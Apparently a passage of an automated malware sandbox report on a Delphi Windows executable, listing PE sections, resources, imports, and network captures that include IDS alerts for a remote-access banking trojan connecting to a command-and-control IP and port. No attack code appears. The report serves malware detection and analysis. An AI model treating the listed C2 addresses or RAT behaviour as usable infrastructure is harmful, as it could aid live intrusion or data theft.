                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x4c80000x6d.edata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4c30000x3bcc.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5340000xb87600.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4cb0000x68d24.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x4ca0000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x4c3a780x938.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4c70000xcba.didata
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x4a23cc0x4a2400f5f8ccda1a307202c6c7962e04af99d2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0x4a40000x32b40x340028a473619959e8561758d252642b3183False0.5259164663461539data6.3031884940201675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0x4a80000x12a840x12c00930d0cb7a6adeaccbda21771572e6a2eFalse0.4514453125data5.254698117597858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0x4bb0000x7bac0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0x4c30000x3bcc0x3c002a38558d252082e4fa9717c35f8fe828False0.3294270833333333data5.073982386819174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didata0x4c70000xcba0xe0065241c26d81e8679f0b722e763e353c2False0.3267299107142857data4.132414128380479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .edata0x4c80000x6d0x20058c891240fa923bc27c6a3cdaf9979adFalse0.171875data1.2878106550381676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .tls0x4c90000x580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0x4ca0000x5d0x2004b43cedfc39507543d7798c37294f9bdFalse0.189453125data1.383131954273433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x4cb0000x68d240x68e00e7b8d97ed50e19b38175fa9966b51078False0.5448194465137068data6.701719733741433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              .rsrc0x5340000xb876000xb87600932cd71749c3e8638c2ec7cd9a23da31unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_CURSOR0x535ab00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                              RT_CURSOR0x535be40x134dataEnglishUnited States0.4642857142857143
                              RT_CURSOR0x535d180x134dataEnglishUnited States0.4805194805194805
                              RT_CURSOR0x535e4c0x134dataEnglishUnited States0.38311688311688313
                              RT_CURSOR0x535f800x134dataEnglishUnited States0.36038961038961037
                              RT_CURSOR0x5360b40x134dataEnglishUnited States0.4090909090909091
                              RT_CURSOR0x5361e80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                              RT_ICON0x53631c0x294PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0166666666666666
                              RT_ICON0x5365b00x2faPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144356955380578
                              RT_ICON0x5368ac0x3eePNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010934393638171
                              RT_ICON0x536c9c0x596PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076923076923077
                              RT_ICON0x5372340x6b8PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0063953488372093
                              RT_ICON0x5378ec0x81fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0052910052910053
                              RT_ICON0x53810c0x9f5PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0043154178109062
                              RT_ICON0x538b040x1f1ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9713783580215918
                              RT_STRING0x53aa240xa4data0.5975609756097561
                              RT_STRING0x53aac80x52cdata0.3716012084592145
                              RT_STRING0x53aff40x598data0.3498603351955307
                              RT_STRING0x53b58c0x52cdata0.23867069486404835
                              RT_STRING0x53bab80x57cdata0.297008547008547
                              RT_STRING0x53c0340x4ecdata0.30873015873015874
                              RT_STRING0x53c5200x494data0.35921501706484643
                              RT_STRING0x53c9b40x324data0.42039800995024873
                              RT_STRING0x53ccd80x3c4AmigaOS bitmap font "n", fc_YSize 30208, 18688 elements, 2nd "l", 3rd "e"0.37655601659751037
                              RT_STRING0x53d09c0x3ccdata0.43621399176954734
                              RT_STRING0x53d4680x744data0.27903225806451615
                              RT_STRING0x53dbac0x588data0.3114406779661017
                              RT_STRING0x53e1340x474data0.39649122807017545
                              RT_STRING0x53e5a80x340data0.43509615384615385
                              RT_STRING0x53e8e80x384data0.41888888888888887
                              RT_STRING0x53ec6c0x514data0.3607692307692308
                              RT_STRING0x53f1800x478data0.40646853146853146
                              RT_STRING0x53f5f80x404data0.3861867704280156
                              RT_STRING0x53f9fc0x41cdata0.34600760456273766
                              RT_STRING0x53fe180x448data0.33667883211678834
                              RT_STRING0x5402600x57cdata0.26282051282051283
                              RT_STRING0x5407dc0x3a8data0.4091880341880342
                              RT_STRING0x540b840x574data0.3538681948424069
                              RT_STRING0x5410f80xae4data0.2654232424677188
                              RT_STRING0x541bdc0x844data0.2939508506616257
                              RT_STRING0x5424200xf4cdata0.21884576098059244
                              RT_STRING0x54336c0xb10data0.2891949152542373
                              RT_STRING0x543e7c0xa2cdata0.3248847926267281
                              RT_STRING0x5448a80x920data0.2833904109589041
                              RT_STRING0x5451c80x710data0.3008849557522124
                              RT_STRING0x5458d80x238data0.44190140845070425
                              RT_STRING0x545b100x3e0data0.39919354838709675
                              RT_STRING0x545ef00x5b8data0.34904371584699456
                              RT_STRING0x5464a80x638data0.3806532663316583
                              RT_STRING0x546ae00x3b0data0.4385593220338983
                              RT_STRING0x546e900x470data0.3908450704225352
                              RT_STRING0x5473000x344data0.41148325358851673
                              RT_STRING0x5476440x420data0.4015151515151515
                              RT_STRING0x547a640x39cdata0.43614718614718617
                              RT_STRING0x547e000x388data0.38716814159292035
                              RT_STRING0x5481880x364data0.3490783410138249
                              RT_STRING0x5484ec0x2c8data0.43820224719101125
                              RT_STRING0x5487b40x434data0.3736059479553903
                              RT_STRING0x548be80x384data0.3611111111111111
                              RT_STRING0x548f6c0x40cdata0.4034749034749035
                              RT_STRING0x5493780x120data0.6215277777777778
                              RT_STRING0x5494980xd0data0.6778846153846154
                              RT_STRING0x5495680x198data0.5294117647058824
                              RT_STRING0x5497000x2dcdata0.45491803278688525
                              RT_STRING0x5499dc0x3acdata0.39787234042553193
                              RT_STRING0x549d880x3f4data0.38735177865612647
                              RT_STRING0x54a17c0x460data0.3794642857142857
                              RT_STRING0x54a5dc0x38cdata0.30176211453744495
                              RT_STRING0x54a9680x374data0.4253393665158371
                              RT_STRING0x54acdc0x3d0data0.4077868852459016
                              RT_STRING0x54b0ac0x660data0.3449754901960784
                              RT_STRING0x54b70c0x438data0.3685185185185185
                              RT_STRING0x54bb440x46cdata0.3197879858657244
                              RT_STRING0x54bfb00x334data0.4097560975609756
                              RT_STRING0x54c2e40x328data0.35396039603960394
                              RT_STRING0x54c60c0x44cdata0.3927272727272727
                              RT_STRING0x54ca580x1ecdata0.3983739837398374
                              RT_STRING0x54cc440xc4data0.6428571428571429
                              RT_STRING0x54cd080x150data0.5744047619047619
                              RT_STRING0x54ce580x3e8data0.408
                              RT_STRING0x54d2400x498data0.29336734693877553
                              RT_STRING0x54d6d80x2f8data0.45263157894736844
                              RT_STRING0x54d9d00x2f0data0.3776595744680851
                              RT_STRING0x54dcc00x368data0.29243119266055045
                              RT_RCDATA0x54e0280xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                              RT_RCDATA0x54ed880xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                              RT_RCDATA0x54fae00xcfcPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003309265944645
                              RT_RCDATA0x5507dc0xcd9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033444816053512
                              RT_RCDATA0x5514b80xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                              RT_RCDATA0x5522180xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                              RT_RCDATA0x552f700xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                              RT_RCDATA0x553bc00xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                              RT_RCDATA0x5548100xcb5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033814940055334
                              RT_RCDATA0x5554c80xcb0PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033866995073892
                              RT_RCDATA0x5561780xd56PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032220269478618
                              RT_RCDATA0x556ed00xd47PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032362459546926
                              RT_RCDATA0x557c180xdc2PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031232254400908
                              RT_RCDATA0x5589dc0xdc5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031205673758865
                              RT_RCDATA0x5597a40xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                              RT_RCDATA0x55a4980xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                              RT_RCDATA0x55b1880xda9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031455533314269
                              RT_RCDATA0x55bf340xda6PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031482541499714
                              RT_RCDATA0x55ccdc0xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                              RT_RCDATA0x55d9d00xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                              RT_RCDATA0x55e6c00x10data1.5
                              RT_RCDATA0x55e6d00x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                              RT_RCDATA0x55fb5c0x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                              RT_RCDATA0x560c7c0xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                              RT_RCDATA0x561a080x1394data0.47186751795690346
                              RT_RCDATA0x562d9c0x4dataEnglishUnited States3.0
                              RT_RCDATA0x562da00xb16Delphi compiled form 'TForm1'0.42353770260747003
                              RT_RCDATA0x5638b80x947bdbDelphi compiled form 'TForm2'0.033049583435058594
                              RT_RCDATA0xeab4940x1601Delphi compiled form 'TForm3'0.307651340315995
                              RT_RCDATA0xeaca980x20e034Delphi compiled form 'TForm4'0.04551410675048828
                              RT_GROUP_CURSOR0x10baacc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                              RT_GROUP_CURSOR0x10baae00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                              RT_GROUP_CURSOR0x10baaf40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x10bab080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x10bab1c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x10bab300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x10bab440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_ICON0x10bab580x76dataEnglishUnited States0.7033898305084746
                              RT_VERSION0x10babd00x204dataEnglishUnited States0.4903100775193798
                              RT_MANIFEST0x10badd40x70bXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.403771491957848
                              DLLImport
                              wininet.dllInternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW
                              winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                              comctl32.dllImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                              shell32.dllShell_NotifyIconW, SHAppBarMessage, ShellExecuteW
                              user32.dllMoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, ClipCursor, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, SetSystemCursor, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetWindowTextLengthW, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, mouse_event, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, keybd_event, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, IsCharAlphaW, GetCursor, KillTimer, BeginDeferWindowPos, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, VkKeyScanW, DestroyMenu, SetWindowsHookExW, EmptyClipboard, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CountClipboardFormats, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, DeferWindowPos, HideCaret, EndDeferWindowPos, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
                              version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                              oleaut32.dllSafeArrayPutElement, SafeArrayDestroy, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, SafeArrayGetElemsize, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopyInd, VariantChangeType, SafeArrayCopy
                              WTSAPI32.DLLWTSUnRegisterSessionNotification, WTSRegisterSessionNotification
                              advapi32.dllRegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegQueryValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
                              msvcrt.dllmemcpy, memset
                              kernel32.dllSetFileAttributesW, GetFileTime, GetFileType, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, WinExec, GetVersionExW, VerifyVersionInfoW, HeapCreate, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                              wsock32.dllgethostbyaddr, WSACleanup, gethostbyname, bind, gethostname, closesocket, WSAGetLastError, connect, inet_addr, getpeername, WSAAsyncSelect, WSAAsyncGetServByName, WSACancelAsyncRequest, send, ntohs, htons, WSAStartup, getservbyname, getsockname, listen, socket, recv, inet_ntoa, ioctlsocket, WSAAsyncGetHostByName
                              ole32.dllIsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                              gdi32.dllPie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, SelectClipRgn, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, PolyBezierTo, CreateICW, CreateDCW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetEnhMetaFileDescriptionW, ArcTo, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, Rectangle, SaveDC, DeleteDC, FrameRgn, BitBlt, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CombineRgn, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
                              Magnification.dllMagSetWindowSource, MagInitialize, MagSetImageScalingCallback, MagSetWindowFilterList
                              NameOrdinalAddress
                              __dbk_fcall_wrapper20x412dcc
                              dbkFCallWrapperAddr10x8be644
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Download Network PCAP: filteredfull

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-19T20:36:17.886678+01002020315ET MALWARE KL-Remote / Cryp_Banker14 RAT connection1192.168.2.74970724.152.39.1355417TCP
                              2024-11-19T20:36:18.601634+01002020316ET MALWARE KL-Remote / Cryp_Banker14 RAT response124.152.39.1355417192.168.2.749707TCP
                              • Total Packets: 25
                              • 55417 undefined
                              • 80 (HTTP)
                              • 53 (DNS)
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 19, 2024 20:36:12.193453074 CET4970180192.168.2.7104.237.62.213
                              Nov 19, 2024 20:36:12.198350906 CET8049701104.237.62.213192.168.2.7
                              Nov 19, 2024 20:36:12.198424101 CET4970180192.168.2.7104.237.62.213
                              Nov 19, 2024 20:36:12.198534012 CET4970180192.168.2.7104.237.62.213
                              Nov 19, 2024 20:36:12.203464985 CET8049701104.237.62.213192.168.2.7
                              Nov 19, 2024 20:36:12.784324884 CET8049701104.237.62.213192.168.2.7
                              Nov 19, 2024 20:36:12.789654970 CET4970180192.168.2.7104.237.62.213
                              Nov 19, 2024 20:36:12.804812908 CET8049701104.237.62.213192.168.2.7
                              Nov 19, 2024 20:36:12.804873943 CET4970180192.168.2.7104.237.62.213
                              Nov 19, 2024 20:36:14.645380974 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:36:14.650243044 CET8049702154.205.156.20192.168.2.7
                              Nov 19, 2024 20:36:14.650414944 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:36:14.650507927 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:36:14.655545950 CET8049702154.205.156.20192.168.2.7
                              Nov 19, 2024 20:36:15.313024044 CET8049702154.205.156.20192.168.2.7
                              Nov 19, 2024 20:36:15.313102007 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:36:17.545587063 CET4970555417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:17.557590961 CET554174970524.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:17.557662010 CET4970555417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:17.881633043 CET4970755417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:17.886504889 CET554174970724.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:17.886565924 CET4970755417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:17.886677980 CET4970755417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:17.891702890 CET554174970724.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:18.601634026 CET554174970724.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:18.601947069 CET4970755417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:18.606892109 CET554174970724.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:18.772856951 CET554174970724.152.39.13192.168.2.7
                              Nov 19, 2024 20:36:18.959151983 CET4970755417192.168.2.724.152.39.13
                              Nov 19, 2024 20:36:20.317301989 CET8049702154.205.156.20192.168.2.7
                              Nov 19, 2024 20:36:20.317383051 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:04.626252890 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:04.929569006 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:05.537547112 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:06.750593901 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:09.161593914 CET4970280192.168.2.7154.205.156.20
                              Nov 19, 2024 20:38:13.968336105 CET4970280192.168.2.7154.205.156.20
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 19, 2024 20:36:12.183645010 CET5993153192.168.2.71.1.1.1
                              Nov 19, 2024 20:36:12.190618038 CET53599311.1.1.1192.168.2.7
                              Nov 19, 2024 20:36:17.245806932 CET5748853192.168.2.71.1.1.1
                              Nov 19, 2024 20:36:17.379138947 CET53574881.1.1.1192.168.2.7
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 19, 2024 20:36:12.183645010 CET192.168.2.71.1.1.10x4a00Standard query (0)api64.ipify.orgA (IP address)IN (0x0001)false
